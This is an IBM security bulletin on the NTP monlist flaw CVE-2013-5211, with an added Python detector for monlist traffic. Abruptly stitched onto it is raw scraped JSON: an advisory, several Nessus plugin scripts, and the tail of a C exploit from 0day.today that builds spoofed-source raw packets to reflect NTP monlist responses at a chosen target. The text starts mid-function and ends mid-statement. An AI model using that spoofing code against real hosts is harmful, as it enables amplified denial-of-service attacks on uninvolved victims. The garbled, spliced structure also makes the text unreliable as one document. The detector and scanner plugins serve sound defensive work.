## Summary
Security vulnerabilities have been discovered in the NTP component of IBM Security Network Intrusion Prevention System.
## Vulnerability Details
**CVEID:** [CVE-2013-5211](<https://vulners.com/cve/CVE-2013-5211>)
**DESCRIPTION:**
NTP is vulnerable to a denial of service, caused by an error in the monlist feature in ntp_request.c. By sending a specially crafted REQ_MON_GETLIST or REQ_MON_GETLIST_1 request, an attacker could exploit this vulnerability to consume available CPU resources and cause the server to crash.
CVSS Base Score: 5.0
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/90143](<https://exchange.xforce.ibmcloud.com/vulnerabilities/90143>) for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)
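For detection, the following added example (not IBM's or ntpd's code) classifies captured NTP UDP payloads and flags the mode 7 REQ_MON_GETLIST and REQ_MON_GETLIST_1 requests named in the description, plus any monlist responses a server sends back. The request codes and header layout follow ntpd's ntp_request.h; the function names, sample payloads and documentation-range addresses are constructed for illustration.

```python
"""Flag NTP mode 7 monlist traffic (CVE-2013-5211) in captured UDP payloads."""
from collections import Counter
from dataclasses import dataclass
from typing import Iterable, Optional, Tuple

MODE_PRIVATE = 7                      # NTP mode 7: private/implementation-specific requests
MONLIST_CODES = {                     # request codes as defined in ntpd's ntp_request.h
    20: "REQ_MON_GETLIST",
    42: "REQ_MON_GETLIST_1",
}


@dataclass(frozen=True)
class Mode7Header:
    response: bool        # R bit: set on packets sent by the server
    more: bool            # M bit: more response packets follow
    version: int
    authenticated: bool
    sequence: int
    implementation: int
    request: int
    err: int
    nitems: int
    item_size: int


def parse_mode7(payload: bytes) -> Optional[Mode7Header]:
    """Parse the fixed 8-byte mode 7 header; None if too short or not mode 7."""
    if len(payload) < 8 or payload[0] & 0x07 != MODE_PRIVATE:
        return None
    err_nitems = int.from_bytes(payload[4:6], "big")   # 4 bits error, 12 bits item count
    mbz_size = int.from_bytes(payload[6:8], "big")     # 4 bits zero, 12 bits item size
    return Mode7Header(
        response=bool(payload[0] & 0x80),
        more=bool(payload[0] & 0x40),
        version=(payload[0] >> 3) & 0x07,
        authenticated=bool(payload[1] & 0x80),
        sequence=payload[1] & 0x7F,
        implementation=payload[2],
        request=payload[3],
        err=err_nitems >> 12,
        nitems=err_nitems & 0x0FFF,
        item_size=mbz_size & 0x0FFF,
    )


def classify(payload: bytes) -> str:
    """Return a verdict string for one UDP/123 payload."""
    if not payload or payload[0] & 0x07 != MODE_PRIVATE:
        return "not-mode7"
    hdr = parse_mode7(payload)
    if hdr is None:
        return "mode7-truncated"
    name = MONLIST_CODES.get(hdr.request)
    if name is None:
        return "mode7-other"
    direction = "response" if hdr.response else "request"
    return f"monlist-{direction}:{name}"


def scan(records: Iterable[Tuple[str, str, bytes]]):
    """records: (src_ip, dst_ip, udp_payload) tuples.

    Returns (alerts, requests_per_source, responders). A responder is a host
    seen answering monlist, i.e. a server that still has the feature reachable.
    """
    alerts, per_source, responders = [], Counter(), set()
    for src, dst, payload in records:
        verdict = classify(payload)
        if verdict.startswith("monlist-request"):
            per_source[src] += 1
            alerts.append((src, dst, verdict))
        elif verdict.startswith("monlist-response"):
            responders.add(src)
            alerts.append((src, dst, verdict))
    return alerts, per_source, responders


# Constructed sample payloads (not captured traffic).
CLIENT_REQ = bytes([0x23]) + bytes(47)                   # ordinary NTPv4 client query, mode 3
MONLIST_1_REQ = bytes([0x17, 0x00, 0x03, 42]) + bytes(4)  # mode 7, request code 42
MONLIST_REQ = bytes([0x17, 0x00, 0x03, 20]) + bytes(4)    # mode 7, request code 20
OTHER_MODE7 = bytes([0x17, 0x00, 0x03, 0x00]) + bytes(4)  # mode 7, unrelated request code
TRUNCATED = b"\x17\x00"                                   # mode 7 byte but header cut short
# Response header: R and M bits set, 6 items of 72 bytes (sizes chosen for the sample).
MONLIST_RESP = bytes([0xD7, 0x00, 0x03, 42, 0x00, 0x06, 0x00, 0x48]) + bytes(6 * 72)

SAMPLE = [
    ("198.51.100.7", "192.0.2.10", CLIENT_REQ),
    ("203.0.113.5", "192.0.2.10", MONLIST_1_REQ),
    ("203.0.113.5", "192.0.2.10", MONLIST_REQ),
    ("192.0.2.10", "203.0.113.5", MONLIST_RESP),
    ("198.51.100.9", "192.0.2.10", OTHER_MODE7),
    ("198.51.100.9", "192.0.2.10", TRUNCATED),
]

if __name__ == "__main__":
    found, counts, answering = scan(SAMPLE)
    for src, dst, verdict in found:
        print(f"{src} -> {dst}: {verdict}")
    print("requests per source:", dict(counts))
    print("hosts answering monlist:", sorted(answering))
```
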
## Affected Products and Versions
Products: GX3002, GX4002, GX4004, GX4004-v2, GX5008, GX5008-v2, GX5108, GX5108-v2, GX5208, GX5208-v2, GX6116, GX7412, GX7412-10, GX7412-05, GX7800, GV200, GV1000
Firmware versions: 4.6.1, 4.6, 4.5, 4.4, and 4.3
## Remediation/Fixes
_The following IBM Threat Fixpacks have the fixes for these vulnerabilities. You can download them from the following links:_
_Product_| _VRMF_| _Remediation/First Fix_
---|---|---
_IBM Security Network Intrusion Prevention System_| _4.6.1.0_| [4.6.1.0-ISS-ProvG-AllModels-Hotfix-FP0011](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)
_IBM Security Network Intrusion Prevention System_| _4.6.0.0_| [4.6.0.0-ISS-ProvG-AllModels-Hotfix-FP0015](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)
_IBM Security Network Intrusion Prevention System_| _4.5.0.0_| [4.5.0.0-ISS-ProvG-AllModels-Hotfix-FP0014](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)
_IBM Security Network Intrusion Prevention System_| _4.4.0.0_| [4.4.0.0-ISS-ProvG-AllModels-System-FP0008](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)
_IBM Security Network Intrusion Prevention System_| _4.3.0.0_| [4.3.0.0-ISS-ProvG-AllModels-System-FP0006](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)
## Workarounds and Mitigations
None
0xffff);\r\n sum = sum + (sum>>16);\r\n answer=(short)~sum;\r\n return(answer);\r\n}\r\n \r\n \r\n//Da MAIN\r\n \r\nint main(int argc, char **argv)\r\n{\r\nint status; // Maintains the return values of the functions\r\nstruct iphdr *ip; // Pointer to ip header struct\r\nstruct udpheader *udp; // Pointer to udp header struct\r\nstruct ntpreqheader *ntp; // Pointer to ntp request header struct\r\nint sockfd; // Maintains the socket file descriptor\r\nint one = 1; // Sets the option IP_HDRINCL of the sockt to tell the kernel that the header are alredy included on the packets.\r\nstruct sockaddr_in dest; // Maintains the data of the destination address\r\nchar packet[ sizeof(struct iphdr) + sizeof(struct udpheader) + sizeof(struct ntpreqheader) ]; //Packet itself\r\n \r\n// Parameters check\r\n if( argc != 3){\r\n printf(\"Usage: ./ntpDdos [Target IP] [NTP Server IP]\\n\");\r\n printf(\"Example: ./ntpDdos 1.2.3.4 127.0.0.1 \\n\");\r\n printf(\"Watch it on wireshark!\\n\");\r\n printf(\"Coded for education purpose only!\\n\");\r\n exit(1);\r\n }\r\n \r\n// Create a socket and tells the kernel that we want to use udp as layer 4 protocol\r\n sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);\r\n if (sockfd == -1){\r\n printf(\"Error on initializing the socket\\n\");\r\n exit(1);\r\n }\r\n \r\n \r\n \r\n//Sets the option IP_HDRINCL\r\n status = setsockopt( sockfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof one);\r\n if (status == -1){\r\n printf(\"Error on setting the option HDRINCL on socket\\n\");\r\n exit(1);\r\n }\r\n \r\n \r\n//\"Zeroes\" all the packet stack\r\n memset( packet, 0, sizeof(packet) );\r\n \r\n \r\n//Mounts the packet headers\r\n// [ [IP HEADER] [UDP HEADER] [NTP HEADER] ] --> Victory!!!\r\n ip = (struct iphdr *)packet;\r\n udp = (struct udpheader *) (packet + sizeof(struct iphdr) );\r\n ntp = (struct ntpreqheader *) (packet + sizeof(struct iphdr) + sizeof(struct udpheader) );\r\n \r\n \r\n//Fill the IP Header\r\n ip->version = 4; //IPv4\r\n ip->ihl = 5; //Size 
of the Ip header, minimum 5\r\n ip->tos = 0; //Type of service, the default value is 0\r\n ip->tot_len = sizeof(packet); //Size of the datagram\r\n ip->id = htons(1234); //LengthIdentification Number\r\n ip->frag_off = 0; //Flags, zero represents reserved\r\n ip->ttl = 255; //Time to Live. Maximum of 255\r\n ip->protocol = IPPROTO_UDP; //Sets the UDP as the next layer protocol\r\n ip->check = 0; //Checksum.\r\n ip->saddr = inet_addr( argv[1] ); //Source ip ( spoofing goes here)\r\n ip->daddr = inet_addr( argv[2] ); //Destination IP\r\n \r\n //Fills the UDP Header\r\n udp->udp_sourcePortNumber = htons( atoi( \"123\" ) ); //Source Port\r\n udp->udp_destinationPortNumber = htons(atoi(\"123\")) ; //Destination Port\r\n udp->udp_length = htons( sizeof(struct udpheader) + sizeof(struct ntpreqheader) ); //Length of the packet\r\n udp->udp_checksum = 0; //Checksum\r\n \r\n //Calculate the checksums\r\n ip->check = csum((unsigned short *)packet, ip->tot_len); //Calculate the checksum for iP header\r\n \r\n //Sets the destination data\r\n dest.sin_family = AF_INET; // Address Family Ipv4\r\n dest.sin_port = htons (atoi( \"123\" ) ) ; // Destination port\r\n dest.sin_addr.s_addr = inet_addr( argv[2] ); // Destination Endere\u00e7o para onde se quer enviar o pacote\r\n \r\n //Fills the NTP header\r\n //Ok, here is the magic, we need to send a request ntp packet with the modes and codes sets for only MON_GETLIST\r\n //To do this we can import the ntp_types.h and use its structures and macros. 
To simplify i've created a simple version of the\r\n // ntp request packet and hardcoded the values for the fields to make a \"MON_GETLIST\" request packet.\r\n // To learn more, read this: http://searchcode.com/codesearch/view/451164#127\r\n ntp->rm_vn_mode=0x17; //Sets the response bit to 0, More bit to 0, Version field to 2, Mode field to 7\r\n ntp->implementation=0x03; //Sets the implementation to 3\r\n ntp->request=0x2a; //Sets the request field to 42 ( MON_GETLIST )\r\n //All the other fields of the struct are zeroed\r\n \r\n \r\n // Sends the packets\r\n status = sendto(sockfd, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(dest) );\r\n if(status <0){\r\n printf(\"Failed to send the packets\\n\");\r\n exit(1);\r\n }\r\n \r\n \r\n}\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/22197", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "suse": [{"lastseen": "2016-04-13T00:07:25", "description": "The \"monlist\" command of the NTP protocol is currently abused in a DDoS reflection attack. This is done by spoofing packets from addresses to which the attack is directed to. The ntp installations itself are not target of the attack, but they are part of the DDoS network which the attacker is driving. It is therefore necessary to restrict ntp configurations to not answer spoofed \"monlist\" requests. 
It is not necessary to update the ntp software itself.\n#### Solution\nTo ensure that your ntpd installation can not participate in a DDoS attack, add the following line to your configuration: restrict default noquery", "cvss3": {}, "published": "2014-01-20T17:05:38", "type": "suse", "title": "DDoS reflection attacks in ntp", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2014-01-20T17:05:38", "id": "SUSE-SA:2014:001", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-01/msg00005.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2023-05-18T14:20:55", "description": "The monlist feature in ntpd in NTP allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.", "cvss3": {}, "published": "2014-06-17T00:00:00", "type": "nessus", "title": "AIX 6.1 TL 8 : ntp (IV58068)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2023-04-21T00:00:00", "cpe": ["cpe:/o:ibm:aix:6.1"], "id": "AIX_IV58068.NASL", "href": "https://www.tenable.com/plugins/nessus/76078", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory ntp_advisory.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76078);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/21\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"AIX 6.1 TL 8 : ntp (IV58068)\");\n script_summary(english:\"Check for APAR IV58068\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The monlist feature in ntpd in NTP allows remote attackers 
to cause a\ndenial of service (traffic amplification) via forged (1)\nREQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2023 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! 
get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"08\", sp:\"04\", patch:\"IV58068s4a\", package:\"bos.net.tcp.client\", minfilesetver:\"6.1.8.0\", maxfilesetver:\"6.1.8.17\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:26:15", "description": "The monlist feature in ntpd in NTP allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.", "cvss3": {}, "published": "2014-06-17T00:00:00", "type": "nessus", "title": "AIX 6.1 TL 7 : ntp (IV58413)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2023-04-21T00:00:00", "cpe": ["cpe:/o:ibm:aix:6.1"], "id": "AIX_IV58413.NASL", "href": "https://www.tenable.com/plugins/nessus/76079", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory ntp_advisory.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76079);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/21\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"AIX 6.1 TL 7 : ntp (IV58413)\");\n script_summary(english:\"Check for APAR IV58413\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The monlist feature in ntpd in NTP allows remote attackers to cause 
a\ndenial of service (traffic amplification) via forged (1)\nREQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2023 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! 
get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"07\", sp:\"09\", patch:\"IV58413s9a\", package:\"bos.net.tcp.client\", minfilesetver:\"6.1.7.0\", maxfilesetver:\"6.1.7.20\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:10:05", "description": "Description of changes:\n\n[4.2.6p5-22.0.1.el7_2.2]\n- add disable monitor to default ntp.conf [CVE-2013-5211]", "cvss3": {}, "published": "2016-09-13T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : ntp (ELSA-2016-3612)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:ntp", "p-cpe:/a:oracle:linux:ntp-doc", "p-cpe:/a:oracle:linux:ntp-perl", "p-cpe:/a:oracle:linux:ntpdate", "p-cpe:/a:oracle:linux:sntp", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2016-3612.NASL", "href": "https://www.tenable.com/plugins/nessus/93448", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2016-3612.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93448);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"Oracle Linux 7 : ntp (ELSA-2016-3612)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The 
remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[4.2.6p5-22.0.1.el7_2.2]\n- add disable monitor to default ntp.conf [CVE-2013-5211]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-September/006328.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ntp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ntp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ntp-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:sntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ntp-4.2.6p5-22.0.1.el7_2.2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ntp-doc-4.2.6p5-22.0.1.el7_2.2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ntp-perl-4.2.6p5-22.0.1.el7_2.2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ntpdate-4.2.6p5-22.0.1.el7_2.2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"sntp-4.2.6p5-22.0.1.el7_2.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) 
security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp / ntp-doc / ntp-perl / ntpdate / sntp\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:14", "description": "New ntp packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix a security issue.", "cvss3": {}, "published": "2014-02-14T00:00:00", "type": "nessus", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : ntp (SSA:2014-044-02)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:ntp", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux:13.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1"], "id": "SLACKWARE_SSA_2014-044-02.NASL", "href": "https://www.tenable.com/plugins/nessus/72489", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2014-044-02. 
The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72489);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-5211\");\n script_bugtraq_id(64692);\n script_xref(name:\"SSA\", value:\"2014-044-02\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : ntp (SSA:2014-044-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New ntp packages are available for Slackware 13.0, 13.1, 13.37, 14.0,\n14.1, and -current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.575205\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?81014405\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ntp package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/02/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif 